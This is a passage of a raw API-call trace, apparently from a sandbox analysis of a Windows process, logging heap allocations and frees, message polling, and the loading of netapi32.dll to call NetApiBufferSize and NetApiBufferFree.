RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6b88e0 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0072.870] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b88e0 | out: hHeap=0x650000) returned 1 [0072.870] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.870] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690850 | out: hHeap=0x650000) returned 1 [0072.870] PeekMessageW (in: lpMsg=0x61ebdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebdc) returned 0 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690850 [0072.870] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d630 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b060 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0072.870] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b060 | out: hHeap=0x650000) returned 1 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6907f0 [0072.870] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6907f0 | out: hHeap=0x650000) returned 1 [0072.870] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0072.870] PeekMessageW (in: lpMsg=0x61ebdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebdc) returned 0 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d658 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b060 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b078 [0072.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0c0 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6907f0 [0072.871] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0c0 | out: hHeap=0x650000) returned 1 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0c0 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690810 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0072.871] CharUpperBuffW (in: lpsz="_BUFFERSIZE", cchLength=0xb | out: lpsz="_BUFFERSIZE") returned 0xb [0072.871] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0072.871] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6a8 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690770 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6d0 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b120 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690760 [0072.871] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b0a8 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0f0 [0072.871] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690760 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b108 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0072.872] PeekMessageW (in: lpMsg=0x61e58c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e58c) returned 0 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d720 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b150 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690750 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8c8 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0072.872] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8c8 | out: hHeap=0x650000) returned 1 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d748 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8c8 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0072.872] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a8b0 [0072.872] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1c8 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a940 [0072.872] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.872] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0072.873] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.873] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.873] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af58 [0072.873] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.873] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.873] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b048 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b048 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b048 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0072.873] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.873] LoadLibraryW (lpLibFileName="Netapi32.dll") returned 0x75660000 [0072.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0072.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferSize", cchWideChar=17, lpMultiByteStr=0x6f96c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferSize", lpUsedDefaultChar=0x0) returned 17 [0072.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac88 | out: hHeap=0x650000) returned 1 [0072.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0072.882] GetProcAddress (hModule=0x75660000, lpProcName="NetApiBufferSize") returned 0x75653789 [0072.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d798 | out: hHeap=0x650000) returned 1 [0072.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d798 | out: hHeap=0x650000) returned 1 [0072.882] NetApiBufferSize (in: Buffer=0x68b450, ByteCount=0x61df28 | out: ByteCount=0x61df28) returned 0x0 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac58 | out: hHeap=0x650000) returned 1 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac40 | out: hHeap=0x650000) returned 1 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac58 | out: hHeap=0x650000) returned 1 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906f0 | out: hHeap=0x650000) returned 1 [0072.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0072.883] FreeLibrary (hLibModule=0x75660000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b030 | out: hHeap=0x650000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8c8 | out: hHeap=0x650000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a8b0 | out: hHeap=0x650000) returned 1 [0072.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a940 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1c8 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af58 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aef8 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af10 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0072.886] PeekMessageW (in: lpMsg=0x61e58c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e58c) returned 0 [0072.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0072.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6b8b00 [0072.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690730 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b00 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0072.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0072.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690700 [0072.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0072.887] PeekMessageW (in: lpMsg=0x61e58c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e58c) returned 0 [0072.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0072.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690730 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690730 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b108 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac28 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac40 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac58 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aca0 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b88e0 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b150 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d720 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0a8 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0072.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b120 | out: hHeap=0x650000) returned 1 [0072.887] CharLowerBuffW (lpsz="wchar[40]", cchLength=0x9) [0072.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b480 [0072.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0a8 [0072.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0072.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b150 [0072.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0072.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0072.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690720 [0072.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aca0 [0072.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690760 [0072.888] PeekMessageW (in: lpMsg=0x61ebdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebdc) returned 0 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d680 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b120 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6907f0 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0c0 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690750 [0072.898] PeekMessageW (in: lpMsg=0x61ebdc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebdc) returned 0 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6d0 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690750 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0072.898] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aef8 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690720 [0072.898] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af58 [0072.898] LoadLibraryW (lpLibFileName="netapi32.dll") returned 0x75640000 [0072.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af40 [0072.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690760 [0072.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0072.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x11) returned 0x6f96c8 [0072.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NetApiBufferFree", cchWideChar=17, lpMultiByteStr=0x6f96c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NetApiBufferFree", lpUsedDefaultChar=0x0) returned 17 [0072.909] NetApiBufferFree (Buffer=0x68b450) returned 0x0 [0072.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690760 [0072.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6b88e0 [0072.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690770 [0072.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aeb0 [0072.909] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aec8 [0072.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0072.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0072.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0072.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0072.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aec8 | out: hHeap=0x650000) returned 1 [0072.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aec8 [0072.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0072.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0072.910] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690740 [0072.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0072.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0072.910] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0072.910] FreeLibrary (hLibModule=0x75640000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690720 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d720 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690750 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac58 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b150 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac28 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac40 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b108 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af10 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6d0 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aeb0 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aec8 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b88e0 | out: hHeap=0x650000) returned 1 [0072.913] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690760 | out: hHeap=0x650000) returned 1 [0072.913] PeekMessageW (in: 